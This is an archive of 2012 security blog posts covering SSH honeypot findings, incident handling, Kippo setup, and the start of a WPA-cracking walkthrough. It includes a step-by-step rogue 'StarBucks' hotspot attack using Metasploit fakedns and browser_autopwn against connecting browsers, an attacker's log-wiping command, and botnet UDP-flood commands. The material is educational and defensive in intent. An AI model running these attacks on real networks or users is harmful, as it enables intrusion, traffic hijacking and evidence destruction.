Monthly Archives: December 2012

Honeypot Captures Bad Villain!

On my previous article named Deception Techniques I introduced the concept of Honeypots and illustrated how you could easily run a medium-interaction Honeypot called Kippo. It was highlighted the advantages of running one of these systems. For instance, it could be used to gather intelligence trough the knowledge and information that one could obtain by observing, analyzing and investigating it. To illustrate the intel you can gain, the following facts were captured from a Kippo Honeypot during the first 20 days:

  • 13348 Total break in attempts
  • 667,4 Average break in attempts per day
  • 13290 Unsuccessful break in attempts
  • 2968 Unique account names
  • 8060 Unique passwords
  • 58 Successful break in
  • 71 Unique IPs were used on the 13290 unsuccessful attempts
  • 44 Unique IPs were used on the 58 successful logins
  • 12 Unique IPs logged in and entered commands.
    • Where 8 where from Romania, 2 from Italy, 1 from US and 1 from Germany.

These and other interesting statistics can be visualized using Kippo graph plugin. Or you can query directly on MySQL and produce a tables with the following results, which shows the 12 Bad Villains that successful logged int and entered commands:

IP Country As SSH Client
95.xxx.xxx.xxx Italy AS3269 SSH-2.0-PuTTY_Release_0.62
176.xxx.xxx.xxx Romania AS6910 SSH-2.0-PuTTY_Release_0.62
95.xxx.xxx.xxx Italy AS3269 SSH-2.0-PuTTY_Release_0.62
89.xxx.xxx.xxx Romania AS44203 SSH-2.0-PuTTY_Release_0.62
94.xxx.xxx.xxx Romania AS48161 SSH-2.0-PuTTY_Release_0.62
79.xxx.xxx.xxx Romania AS8708 SSH-2.0-PuTTY_Release_0.62
109.xxx.xxx.xxx Romania AS8953 SSH-2.0-PuTTY_Release_0.62
79.xxx.xxx.xxx Romania AS8708 SSH-2.0-PuTTY_Snapshot_2010_04_07:r8911
188.xxx.xxx.xxx Romania AS8708 SSH-2.0-PuTTY_Release_0.62
38.xxx.xxx.xxx US SSH-2.0-PuTTY_Release_0.60
85.xxx.xxx.xxx Romania AS57568 SSH-2.0-OpenSSH_5.1p1
81.xxx.xxx.xxx Germany AS24961 SSH-2.0-OpenSSH_5.1p1

Other than statistics, Kippo is designed to log the entire shell interaction performed by the attacker plus the archive of any tool they downloaded. From what was observed, after successful login the attacker normally follow the same high level steps:

  • Scanning other systems to identify open SSH ports.
  • Gain access trough SSH brute force.
  • Maintain access by installing rootkits and/or joining the system to IRC Channel.
  • Covering tracks.

Looking deeper into the majority of the attacker sessions, they executed the following actions:

  1. Check the speed of the internet connection by downloading a big file
  2. Check the system Operating System and hardware capabilities
  3. Download necessary tools to :
    1. Perform automated Recon, Scanning and Gain access to other SSH systems via brute force (e.g. gosh) ;
    2. Join the system to an IRC network in order for the system to became part of a larger bot army and wait for attacker commands (e.g. legendbot);
    3. Install IRC proxy/bouncer in order to further hide attacker identity and conceal their IP address when connecting to IRC network and issuing Command & Control commands (e.g. Eggdrop, Emech, Psybnc)
  4. Maintain Access (e.g.Linux user mode rootkits like shv5)
  5. Cover tracks

It is my intention to illustrate these steps and the tools and commands used in further posts. Nevertheless, the following example illustrated the commands issued by one of the attackers in order to cover his tracks:

#unset ; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog ; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog ; unset HISTFILE ; unset HISTSAVE ; unset HISTLOG ; history -n ; unset WATCH ; export HISTFILE=/dev/null ; export HISTFILE=/dev/null

One interesting finding was an attacker that downloaded a bot script written in Perl. The script is called Legend Bot and it consists of 1032 lines of Perl code. It implements a limited set of  features: DDoS attacks (udp floods, sql floods), execution of Linux system, a vulnerability scanner and a Socks proxy. After executed it establishes a connection to a standard IRC network service port, joins the configured attacker’s IRC channel and waits for the attacker’s commands. In this case the IRC channel was hosted at Undernet. For those who don’t know the IRC network Undernet provides a free of charge communication infrastructure which can be misused by attackers to maintain, expand, manage and control their bots army[1].

botmaster

IRC Bot Command and Control

The following picture (nick names removed) illustrates the interaction between a botherder (bad villain)  issuing command and control commands to two compromised systems a.k.a Zombies. This interaction happened on a channel where the chat logs were in  Romanian. First command executed (!legend @system) is used to check the operating system version (uname -a), the system uptime, the name of the process which the bot is running (init[3]) and the user id. Second he checks which  vulnerabilities could be potentially used as local escalation privileges. Third he removes the logs in order to cover is tracks.

After some time finally he launches a UDP Flood DoS attack against a particular system.Interesting that with only 2 systems the attacker can reach easily launch a two digit Megabits DoS attack. This is not shown in the picture but I pasted here the IRC chat logs (IPs removed):

<Botherder> !legend @udp 173.xxx.xxx.xxx 65000 300 22
<Bot1> .:UDP2:. UDP2 Attacking 173.xxx.xxx.xxx:22 with 65000 KB(s) for 300 seconds.
<Bot1> .:UDP2:. UDP2 Attacking 173.xxx.xxx.xxx:22 with 65000 KB(s) for 300 seconds.
<Bot1> .:UDP2:. UDP2 Sent 1275439 Kb in 300 seconds to 173.xxx.xxx.xxx.
<Bot2> .:UDP2:. UDP2 Sent 10581733 Kb in 300 seconds to 173.xxx.xxx.xxx.

Among others, the value of these compromised systems relies on their capability to be as used as vulnerability scanners, anonymity proxies and/or be part of Denial of Service attacks. To further understand the motives and monetary value behind having compromised systems you can read this article from Krebs on Security, or read the book Inside Spam Cartel by Spammer-X.

Learning the techniques of the attackers can be very useful in order to better understand the motives and methods. Plus will allow you to sharpen your intrusion detection, incident handling and forensic skills.

References:

[1] Analysis of Internet Relay Chat Usage by DDoS Zombies, Stéphane Racine, 2004

Tagged , ,

Computer Security Incident Handling – 6 Steps

incidentresponseActionable information to deal with computer security Incidents. Repeatable and effective steps. Steps that are unanimous among security practitioners.
It’s a good way to describe the SANS methodology for incident handling, compelled by Stephen Northcutt and others. With its origins on the Computer Incident Response Guidebook (pub. #: 5239-19) from US Navy Staff Office back in 1996. It is a 6 steps methodology. It will help you quickly and efficiently recover from a security incident.

The purpose of these 6 steps is to respond systematically to incidents. It includes the ability to minimize loss or theft of information or disruption of services when an incident occurs.

Types of incidents might include malicious code attacks, denial of service, espionage, sabotage, hoaxes, unauthorized access, insider threats, policy violations and many others.The six steps are preparation, identifications, containment, eradication, recovery and lessons learned.

A very similar process has also been brought to life by NIST on the Computer Security Incident Handling Guide (pub. #: 800-61) published in 2004. This special publication is very consistent with SANS methodology. In fact it is also a 6 step methodology with the difference that step two is named detection instead of identification.

Below a short and high level introduction of the 6 Computer Security Incident Handling steps:

Preparation : It’s at this stage that you develop the formal incident response capability. It’s at this stage where you create an incident response process defining the organizational structure with roles and responsibilities. It’s on this stage that you create your procedures with detailed guidance in order to respond to an incident. Its where you select the right people with the appropriate skill set. Its where you define the criteria do declare an incident. Its where you define the right tools to handle an incident. It’s where you define what you are going to report. To whom are you going to communicate.
This step is crucial to ensure response actions are known and coordinated. Good preparations will help you limits the potential damage by ensuring quick and effective response actions.

Identification: This is the step where you determine if an incident has occurred. Based on events observation, indicators, you look for deviations from normal operations. You look for malicious acts or attempts to do harm. The security mechanism in place will help you doing the identification. Your incident handler team will use their experience to look at the signs and indicators. The observation could occur at network level, host level or system level. It’s where you leverage the alerts and logs from your routers, firewalls, IDS, SIEM, AV gateways, operating system, network flows, etc.  After identifying an incident you need to assess the impact. Notify the appropriate individuals or external parties. If there are reasons to believe that you will engage law enforcement it’s where you ensure chain of custody. It’s also at this stage that you define next steps such as containment.

Containment: The third stage of responding to incidents. It consists of limiting the damage. Stop the bleeding. Stop the attacker. It’s where you make decision on which strategy you will use to contain the incident bases on your processes and procedures. It’s where you engage the business owners and decide to shut down the system or disconnect the network or continue operations and monitor the activity. All depends on the scope, magnitude and impact of the incident.

Eradication:  After successfully contained the incident. The next step entails removing the cause of the incident. In the case of a virus incident it may simply require removing the virus. On other complex incident cases you might need to identify and mitigate exploited vulnerabilities. It’s on this step that you should determine how it was initially executed and apply the necessary measures to ensure don’t happen again.

Recovery: It means back in production. Eventually, restoring a backup or re-image a system. It’s where you return to normal operational status.  After successfully restoration is important to monitor it for a certain time period. Why? Because you want to potentially identify signs that evaded detection.

Lessons Learned: Follow up activity is crucial. It’s where you can reflect and document what happen. Where you can learn what failed and what worked. It’s where you identify improvements for your incident handling processes and procedures. It’s where you write your final report.

References and further reading:

Computer Incident Response Guidebook (pub. #: 5239-19), 1996, US Navy Staff Office
Computer Security Incident Handling Guide (pub. #: 800-61), 2004, US NIST
Incident Handling Step by Step ver. 2.2, 2001, SANS Institute
RFC 2350: Expectations for Computer Incident Response, 1998, IETF
Handbook for Computer Security Incident Response Teams (CSIRTs), 2003, CERT / Carnegie Mellon Software Engineering Institute
Essential Incident Response Activities during the First 24 Hours, 2006, Gartner, Inc.
Good Practice Guide for Incident Management,2o1o, ENISA

Tagged , , , ,

Enjoy great coffee and the Internet at your fingertips.

free-wifi-starbucksBack in 2004, Dino Dai Zovi and Shane Macaulay developed a set of tools for assessing the security of wireless clients at multiple layers known as KARMA. This tool exploited the Windows XP and MacOS X operating systems capability of doing automatic wireless network discovery and known network identification to facilitate wireless networking for the end-user. Those operating systems facilitated the network identification by remembering past wireless networks that have been joined. Plus they will be automatically looking for these networks (referred to as Preferred or Trusted Networks) whenever the wireless network adapter is enabled [1].

Our Evil neighbor could than benefit of this vulnerability inherent in the way Windows XP and Mac OS X operating systems searched for networks. Essentially, Evil neighbor can sniff the wireless network and discover clients plus their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From this point onward  individual clients within wireless radio range of the attacker could be targeted [2]. Evil just needed to create an rogue AP for one of the probed networks and the clients will associate to the wireless network without user interaction. In addition to the rogue AP, the Evil neighbor will need to create a set of fake infrastructure services like DNS and DHCP to serve these clients. With this in place Evil has full control of the traffic, allowing him to launch devastating attacks. Among others, he can setup client side attacks, capture passwords, manipulate routing paths, setup phishing sites, have control over DNS, etc. In addition this set tools have been incorporated into Metasploit framework and named Karmetasploit which lead to further automation and impact.

Besides this attack vector, with the introduction of more recent operating systems such as Windows Vista and 7, this vulnerability was mitigated. However, with the explosion of mobile devices in public areas such as Airports, Hotels, Shopping centers, etc, there is a great opportunity for attackers. Bad guys can use similar techniques to Karma and impersonate Hot Spots. An Evil can simple create a rogue AP pretending to be one of those Hot Spot environment widely used and popular on these areas. Then he just needs to passively wait for people to connect to. How many times did you connect to an open wireless network in a Hotel or Airport or at StarBucks to send that new picture you just took or to send that important email to your boss?

Let’s illustrate how Evil can take advantage of this opportunistic attack by impersonating a popular Hot Spot such as StarBucks. When a victim associates to the rogue Hot Spot, it will be configured with DNS server that we control. In addition, we will leverage the usage of Metasploit Browser Autopwn module. This module creates a web server in our local machine which will contain different browser exploits. The user will be then redirected to this web server trough DNS. Then the execution of the exploits will start against the browser of the victim and if one of the exploits is successful a meterpreter session will open.

In this case Evil would be in a locations that is likely to be frequent by many people. By doing so he will have a better probability of someone to associate with his fake Hot Spot environment.  In this exercise I’m using BackTrack 5 linux distro but any other linux system can be used. For the sake of brevity the majority of commands output  have been removed.

On Backtrack 5, the DHCP server package needs to be installed.
#apt-get install dhcp3-server

Due to some dependencies, you may got the following error:
 dhcp3-server: Depends: dhcp3-common (= 3.1.3-2ubuntu3.2) but 3.1.3-2ubuntu3.3 is to be installed
E: Broken packages

To solve this, you need to remove existing dhcp3-common package and then run the dhcp3-server installation again.
#apt-get remove dhcp3-common
The following packages will be REMOVED:
 dhcp3-client dhcp3-common wicd wicd-daemon wicd-gtk
#apt-get install dhcp3-server
#apt-get install wicd

This was the only requisite in Backtrack 5 since all the other tools are already installed.
Evil needs to create a dhcpd.conf file with the lease settings. Then, he will need to put the wireless interface in monitor mode. Subsequently, he will be using  airbase-ng which is a multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.

He goes into the dhcpd folder and create a dhcpd.conf file with the lease settings shown below.

# cd /etc/dhcp3/
# cp dhcpd.conf dhcpd.orig

# vi dhcpd.conf

 ddns-update-style none;
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
authoritative;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
        range 10.0.0.100 10.0.0.254;
        option routers 10.0.0.1;
        option domain-name-servers 10.0.0.1;
}

Now, he can start by putting the wireless network interface into monitor mode.

$ sudo airmon-ng start wlan0
Interface             Chipset                 Driver
wlan0                    Intel 4965AGN   iwl4965 – [phy0]
                                                                (monitor mode enabled on mon0)

Next step is to use  airbase-ng tool. With this command a tap interface named at0 will be created advertising the ESSID StarBucks on channel 9.

$ sudo airbase-ng -e “StarBucks” -c 9 mon0
15:55:03  Created tap interface at0
15:55:03  Trying to set MTU on at0 to 1500
15:55:03  Access Point with BSSID 00:1D:E0:04:AE:71 started.

Now he will leave this command shell running and open another shell to continue with the rest of the attack.

He will need to bring at0 interface up and assign a IP address and network mask
$ sudo ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

Then he can start the DHCP deamon. First by creating /var/run/dhcpd folder and then assigning the right ownership permisions. Second, start the dhcd3 deamon pointing to the correct configuration file that was created plus the pid file under the right folder.

sudo mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 -pf /var/run/dhcpd/dhcpd.pid at0

$ ps aux | grep dhcpd
dhcpd    12790  0.0  0.0   3864  1772 ?        Ss   15:44   0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 -pf /var/run/dhcpd/dhcpd.pid at0

With this settings, Evil as an Access Point and DHCP infrastructure in place. Every time a new client associates with the network StarBucks, it will get the settings from the DHCP lease wich include our fake DNS server address. Now he will use Metasploit framework to run fake DNS server.

The settings are straightforward. The TARGETACTION can be set to BYPASS, which can be useful for testing the settings. In addition the TARGETDOMAIN can be a specific website instead of (*).

$sudo msfconsole
msf > use auxiliary/server/fakedns

msf  auxiliary(fakedns) > set SRVHOST 10.0.0.1
msf  auxiliary(fakedns) > set TARGETACTION FAKE
msf  auxiliary(fakedns) > set TARGETHOST 10.0.0.1
msf  auxiliary(fakedns) > set TARGETDOMAIN *
msf  auxiliary(fakedns) > show options

msf  auxiliary(fakedns) > run
[*] Auxiliary module execution completed
[*] DNS server initializing
[*] DNS server started

When the victim associates to the StarBucks AP, gets DHCP lease and browses to a particular website he will be redirected via DNS to the host 10.0.0.1.
Now,  Evil will be using Metaploit browser autopwn module that automates client side exploits. First he set the global settings AUTOPWN_HOST, PORT and URI. These specify where the service resides and the URL that will be sent to the client victim. Next, the local options SRVPORT and URIPATH are specified. Finally the LHOST and LPORT tells the module where to direct the connect back shells. In the Metasploit version 4.5.0 the autopwn module is able to load 43 client side exploits to try against different browsers.

msf  auxiliary(fakedns) > use auxiliary/server/browser_autopwn
msf  auxiliary(browser_autopwn) > set AUTOPWN_HOST 10.0.0.1
msf  auxiliary(browser_autopwn) > set AUTOPWN_PORT 55550
msf  auxiliary(browser_autopwn) > set AUTOPWN_URI /ads
msf  auxiliary(browser_autopwn) > set SRVPORT 55550
msf  auxiliary(browser_autopwn) > set URIPATH /ads
msf  auxiliary(browser_autopwn) > set LHOST 10.0.0.1
msf  auxiliary(browser_autopwn) > set LPORT 45000
msf  auxiliary(browser_autopwn) > show options

msf  auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
msf  auxiliary(browser_autopwn) > [*] Obfuscating initial javascript 2012-12-15 09:09:23 -0500
[*] Done in 1.113271598 seconds
[*] Starting exploit modules on host 10.0.0.1…
 ( … )
[*] — Done, found 43 exploit modules
[*] Using URL: http://0.0.0.0:55550/ads
[*]  Local IP: http://127.0.0.1:55550/ads
[*] Server started. 

The AutoPwn server is listening on port 55550 and now he will use the Metasploit http capture module to redirect all arbitrary URLs on port 80 to the AutoPwn module.

msf  auxiliary(browser_autopwn) > use auxiliary/server/capture/http
msf  auxiliary(http) > show options

msf  auxiliary(http) > run
[*] Auxiliary module execution completed
msf  auxiliary(http) >
[*] Listening on 0.0.0.0:80…
[*] Server started.

Now when a user associates to the fake AP you should see the following on the Airbase-ng shell:
09:16:59  Client 04:54:33:7F:4F:AA associated (unencrypted) to ESSID: “StarBucks”
09:16:59  Client 04:54:33:7F:4F:AA associated (unencrypted) to ESSID: “StarBucks”

After that you should see a DHCP exchange between the victim and the DHCP server. You can look at /var/log/messages to see the discover, offer, request and ack transactions.

tail -f /var/log/messages
Dec 14 16:11:40 bt dhcpd: DHCPDISCOVER from 04:54:33:7f:4f:aa via at0
Dec 14 16:11:41 bt dhcpd: DHCPOFFER on 10.0.0.101 to 04:54:33:7f:4f:aa (iPad) via at0
Dec 14 16:11:42 bt dhcpd: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 04:54:33:7f:4f:aa (iPad) via at0
Dec 14 16:11:42 bt dhcpd: DHCPACK on 10.0.0.101 to 04:54:33:7f:4f:aa (iPad) via at0

Finally, when a user browses to a page, DNS server will redirect him to the fake DNS server. When browsing to port 80 the http capture module will interact with it and redirect it to the Autopwn module. The victim will be served with a page that is locate under msf3/data/exploits/capture/http/index.html plus an IFRAME pointing to the AutoPwn exploits.
The following output ilustrates what happen when the client is start to be redeirected by the Fake DNS module and then the AutoPwn kicks in. In this case the AutoPwn module managed to autodetect the client being used and then sent the apropriate exploits. In this case it detected the client as being a Windows 7 and based on this information it delivered 33 exploits.

[*] 10.0.0.101:63184 – DNS – DNS target domain found: *
[*] 10.0.0.101:63184 – DNS – DNS target domain http://www.linkedin.com faked
[*] 10.0.0.101:63184 – DNS – XID 32445 (IN::A http://www.linkedin.com)
[*] 10.0.0.101:55684 – DNS – DNS target domain found: *
[*] 10.0.0.101:55684 – DNS – DNS target domain http://www.monster.com faked
[*] 10.0.0.101:55684 – DNS – XID 37698 (IN::A http://www.monster.com)
[*] 10.0.0.101:63286 – DNS – DNS target domain found: *
[*] 10.0.0.101:63286 – DNS – DNS target domain http://www.yahoo.com faked
[*] 10.0.0.101:63286 – DNS – XID 56637 (IN::A http://www.yahoo.com)

[*] 10.0.0.103       browser_autopwn – Handling ‘/ads’
[*] 10.0.0.103       browser_autopwn – Handling ‘/ads?sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6OC4wOg%3d%3d’
[*] 10.0.0.103       browser_autopwn – JavaScript Report: Microsoft Windows:7:undefined:en-us:x86:MSIE:8.0:
[*] 10.0.0.103       browser_autopwn – Reporting: {:os_name=>”Microsoft Windows”, : os_flavor=>”7″, : os_lang=>”en-us”, :arch=>”x86″}
[*] 10.0.0.103       browser_autopwn – Responding with 33 exploits

Eventually, this will lead to a compromissed system and potentially a shell opened on the Evil system with access to the victim system – I will leave that demonstration and ilustration for futher posts.

As you could see this is a powerfull attack but is also noisy and visible to the victim. An potential victim that is aware of such attacks can easily see that something is wrong when he tries to connect to the Hot Spot. He will be  unable to surf to any webpage and only to a custom suspicious page.

More targetted attacks are feasible and easily done. For example if Evil has two wireless cards on his computer he can easily create a fake Hot Spot environment and route all your traffic trough is computer. Then in a much more discrete and evasive way he can modify traffic content or impersonate services to deliver malicious contents or eavesdropping on sensitive content such as unprotected email. For example he can exploit the execution of automated software downloads. Java is an particular example because at regular intervals the Java updater will contact javadl.esd.sun.com over HTTP. Another example is Mcafee AV updater which will contact updatekeepalive.mcafee.com in order to check for the availability of new updates. Among others tools like Evilgrade which is a modular framework that allows the user to take advantage of poor update and upgrade implementations by injecting fake updates, can be used to accomplish this.

Next time you connect to a free Hot Spot environment within a metropolitan area consider that someone could be impersonating and/or eavesdropping it. Best will be never to connect to a open AP but that might be unrealistic. One simple countermeasure will be to configure static DNS entries which wont stop a determined attacker but potentially gives your more provability to not be a target.

References:
[1] Attacking Automatic Wireless Network Selection, Dino A. Dai Zovi, Shane A. Macaulay, 2005
[2] Hacking Exposed Wireless: Wireless Security Secrets & Solutions, Second Edition, Johnny Cache, Joshua Wright, Vincent Liu, 2010
Metasploit, David Kennedy, Jim O’Gorman, Devon Kearns, 2011

Deception Techniques

deceptionIn the Tactical Deception Field Manual FM 90-2 of the US Army, the concept of deception is described as those measures designed to mislead enemy forces by manipulation, distortion, or falsification of evidence to induce him to react in a manner prejudicial to his interests. In the cyber world the deception concept and deception techniques have been introduced in the early 1990 with the use of honeypots [1].

Honeypots are decoy systems that attract attackers to attempt to compromise them [2], whose value lies in being probed, attacked or compromised [3]. In addition, honeypots can be used to gain advantage in network security. For instance they provide intelligence based on information and knowledge obtained through observation, investigation, analysis, or understanding [4].

Deception techniques such as honeypots are powerful and flexible techniques offering great insight into malicious activity as well as an excellent opportunity to learn about offensive practices. In this post I will be introducing how to create a honeypot for research purposes to learn about attack methods.

If you want to learn more about computer deception I recommend to read Fred Cohen articles. In regard to honeypots in I definitely recommend the landmark book authored by Lance Spitzner in  2002 and published by Addison-Wesley.  One of the many things Lance introduces on his book is the concept of level of interaction to distinguish the different types of honeypots. Basically, this concept provides a way to measure the level of interaction that the system will provide to the attacker. In this post I will be using a medium interaction honeypot called Kippo.

A important aspect before running a honeypot is to make sure you are aware of the legal implications of running a honeypots. You might need to get legal counsel with privacy expertise before running one. The legal concerns are normally around data collection and privacy, especially for high-interaction honeypots. Also you might need permission from your hosting company if you would for example run a honeypot on a virtual private server (vps). Lance on his book as one full chapter dedicated to the legal aspects. Regarding hosting companies that might allow you to run a honeypot you might want to check  Solar vps, VpsLand or Tagadap.

Let’s illustrate how to setup the Kippo SSH honeypot. Kippo is specialized in logging brute force attacks against SSH. It’s also able to store information about the actions the attacker took when they manage to break in. Kippo is considered a low interaction honeypot.  In addition I will be demonstrating how to use a third party application called Kippo-graph to gather statistics and visualize them.

Based on the tests made the easiest way to setup Kippo is on a Debian linux distro. To install it we need a set of packages which are mentioned in the requirements section of the project page. On my case I had a Debian 6 64 bits system with the core build packages installed and made the following:

Using apt (advanced packaging tool) which is the easier way to retrieve, configure and install Debian packages in automated fashion. I installed subversion to be able to then download Kippo. Plus, installed all the packages mentioned in the requisites. Then verified python version to make sure is the one needed. During the installation of the mysql-server package you should be prompted to enter a password for the mysql.

# apt-get update
# apt-get install subversion python-zope python-crypto python-twisted mysql-server ntp python-mysqldb

# python –V
Python 2.6.6

Check the status of MySQL, then try to login with the password inserted during the installation:
# service mysql status
# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 42
Server version: 5.1.66-0+squeeze1 (Debian)
mysql> quit

Check if we have a timesource configured and NTP is syncing:
#ntpq
ntpq> peers
ntpq> quit

Download Kippo using svn. Create the initial configuration file and then login into MySQL and create the necessary database and tables:
#svn checkout http://kippo.googlecode.com/svn/trunk/ /opt/kippo
#cd /opt/kippo/
#cp kippo.cfg.dist kippo.cfg
mysql -u root –p
mysql> CREATE DATABASE kippo;
mysql> USE kippo;
mysql> SOURCE /opt/kippo/doc/sql/mysql.sql
mysql> show tables;
mysql> quit;

Edit the kippo.cfg file and change the hostname directive, ssh port, and banner file. Also uncomment all the directives shown above regarding the ability of Kippo to log into the MySQL database. Make sure you adapt the fields to your environment and use strong passwords:

#vi kippo.cfg

ssh_port = 48222
hostname = server
banner_file = /etc/issue.net

[database_mysql]
host = localhost
database = kippo
username = root
password = secret

Edit the file /etc/issue.net on the system and insert a banner similar to the following:
This system is for the use of authorized users only. Individuals using this computer system without authority, or in excess of their authority, are subject to having all of their activities on this system monitored and recorded by system personnel. In the course of monitoring individuals improperly using this system, or in the course of system maintenance, the activities of authorized users may also be monitored. Anyone using this system expressly consents to such monitoring and is advised that if such monitoring reveals possible evidence of criminal activity, system personnel may provide the evidence of such monitoring to law enforcement officials.

Verify which username and password is used to deceive the attacker that he got the correct credentials and break in:
# cd /opt/kippo/data
# cat userdb.txt
root:0:123456

Then add a non-privileged user to be used to launch Kippo. Its also needed to change the ownership of the Kippo files and directories to the user just created:
# useradd -m –shell /bin/bash kippo
# cd /opt/
# chown kippo:kippo kippo/ -R
# su kippo
$ cd kippo
$ ./start.sh
Starting kippo in background…Generating RSA keypair…
done.
$exit

By default – as you might noticed in the kippo.cfg – Kippo runs on port 2222. Because we start Kippo as a non-privileged used we cannot change it to port 22. One way to circumvent this is to edit the /etc/ssh/sshd_config file and change the listening port to something unusual which will be used to manage the system. Then create an iptables rule that will redirect your TCP traffic destined to port 22 to the port where Kippo is running.
#cat /etc/ssh/sshd_config | grep Port
40822
#service ssh restart

#iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 22 -j REDIRECT –to-port 48022

Depending on your setup you might need or not additional firewall rules. In my case I had the system directly exposed to the Internet therefore I needed to create additional firewall rules. For the iptables on Debian you might want to check this wiki page.

Create a file with the enforcement rules. I will not be including the redirect rule because will allow me to have control when to start and stop redirecting traffic.
vi /etc/iptables.rules
# Sample firewall configuration
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:RH-Firewall-1-INPUT – [0:0]
-A INPUT -j RH-Firewall-1-INPUT
-A FORWARD -j RH-Firewall-1-INPUT
-A RH-Firewall-1-INPUT -i lo -j ACCEPT
-A RH-Firewall-1-INPUT -p icmp –icmp-type any -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state ESTABLISHED,RELATED -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 22 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 2222 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 48022 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 48080 -j ACCEPT
-A RH-Firewall-1-INPUT -j REJECT –reject-with icmp-host-prohibited
COMMIT

I will be allowing ICMP traffic plus TCP port 22 and 2222 for Kippo and 48022 to access the system. Then the 48080 will be for the kippo-graphs.

Note that you might want to add the –source x.x.x.x directive to the rules that allow access to the real ssh and http deamon allowing only your IP address to connect to it.

Then we apply the iptables rules redirecting the contents of the file to the iptables-restore command. Then we need a small script for each time we restart the machine to have the iptables rules loaded as documented on the Debian wiki.

#iptables-restore < /etc/iptables.rules

#vi /etc/network/if-pre-up.d/iptables
#!/bin/bash
/sbin/iptables-restore < /etc/iptables.up.rules

Change the file mode bits
#chmod +x /etc/network/if-pre-up.d/iptables

Subsequently we can install kippo-graphs. To do that we need a set of additional packages:
#apt-get install apache2 libapache2-mod-php5 php5-cli php5-common php5-cgi php5-mysql php5-gd

After that we download kippo-graph into the the webserver root folder, untar it, change the permissions of the generated-graphs folder and change the values in config.php.
#cd /var/www

# wget http://bruteforce.gr/wp-content/uploads/kippo-graph-0.7.2.tar –user-agent=””
# md5sum kippo-graph-0.7.2.tar
#tar xvf kippo-graph-0.7.2.tar
# cd kippo-graph
# chmod 777 generated-graphs

# vi config.php
define(‘DB_HOST’, ‘localhost’);
define(‘DB_USER’, ‘kippo’);
define(‘DB_PASS’, ‘secret’);
define(‘DB_NAME’, ‘kippo’);

Edit the ports configuration settings, under apache folder, to change the port into something hard to guess like 48080. And change the VirtualHosts directive to the port chosen.

 vi /etc/apache2/ports.conf
NameVirtualHost *:48080
Listen 48080

#vi /etc/apache2/sites-enabled/000-default
<VirtualHost *:48080>

#service apache2 restart

Then you can point the browser to your system IP and load the kippo-graphs url. After you confirmed its working you should stop apache. In my case I just start apache to visualize the statistics.

With this you should have a Kippo environment running plus the third party graphs. One important aspect is that, every time you reboot the system you need to: Access the system using the port specified on the sshd config file ;  Apply the iptables redirection traffic ; Stop the apache service and start Kippo. This can be done automatically but I prefer to have control on those aspects because then I now when I start and stop the Kippo service.

#ssh  vps.site.com  -l root -p 48022
#iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 22 -j REDIRECT –to-port 2222

#service apache2 stop
Stopping web server: apache2 … waiting .
#su kippo
$ cd /opt/kippo/
$ ./start.sh
Starting kippo in background…
Loading dblog engine: mysql
$ exit

Based on my experience It shouldn’t take more than 48 hours to have someone breaking in the system. You can than watch and learn. In addition after a couple of hours you should start seeing brute force attempts.

If you want to read more about other honeypots, ENISA (European Network and Information Security Agency) just recently released a study about honeypots called “Proactive Detection of Security Incidents II: Honeypot”. It’s the result of a comprehensive and in-depth investigation about current honeypot technologies. With a focus on open-source solution, a total of 30 different standalone honeypots were tested and evaluated. It’s definitely a must read.

In a future post I will write about the findings of running this deception systems to lure attackers.

References:
[1] The use of Deception Tecniques : Honeypots and decoys, Fred Cohen
[2] The Art of Computer Virus Research and Defense, Peter Szor, Symantec Press
[3] Honeypots. Tracking Hackers, Lance Spitzner, Addison-Wesley
[4] Designing Deception Operations for Computer Network Defense. Jim Yuill, Fred Feer, Dorothy Denning, Fall

Tagged , , , , ,

Watch out for the Wireless Neighborhood!

AirCrackHow safe is your Wireless network? Even if you are using WPA-PSK?

It’s possible to run a series of attacks that potentially allow compromising a wireless network and obtaining the WPA-PSK passphrase. This is likely because the wireless spectrum is a shared medium which means you and your neighbor might share the same channel and you can see his traffic and vice-versa. More, there are techniques and tools available that allow capturing the WPA-PSK handshake. With this capture you can then run a brute force or dictionary attack against it to obtain the passphrase.

The following exercise illustrates how an Evil neighbor can obtain your wireless WPA-PSK passphrase using a variety of offensive techniques and connect to your home or small office network.

This exercise will be executed using backtrack 5 which has all the tools installed but could be done on other Linux distribution or Windows system. In short, to achieve this, Evil just need to put his wireless card in monitor mode, inject packets using a technique known as deuathentication attack. In parallel, capture what is known as the four-way handshake which allows the client and the access point to negotiate the keys used to encrypt the traffic. Then he can run a bruteforce or dictionary attack against it and obtain the passphrase. Let’s see how he can accomplish this:

First he tells the driver for the wireless interface to shut down. Then using macchanger to manipulate the MAC address of the interface and change it to a MAC address for deception purposes. Then he brings the interface up and checks if the MAC address change took effect.

$ ifconfig wlan0 down

$ sudo macchanger –mac=00:de:ad:be:ef:00 wlan0
Current MAC: 00:1d:e0:04:ae:71 (unknown)
Faked MAC:   00:de:ad:be:ef:00 (unknown)

$ sudo ifconfig wlan0 up

$ ifconfig wlan0 | head -1
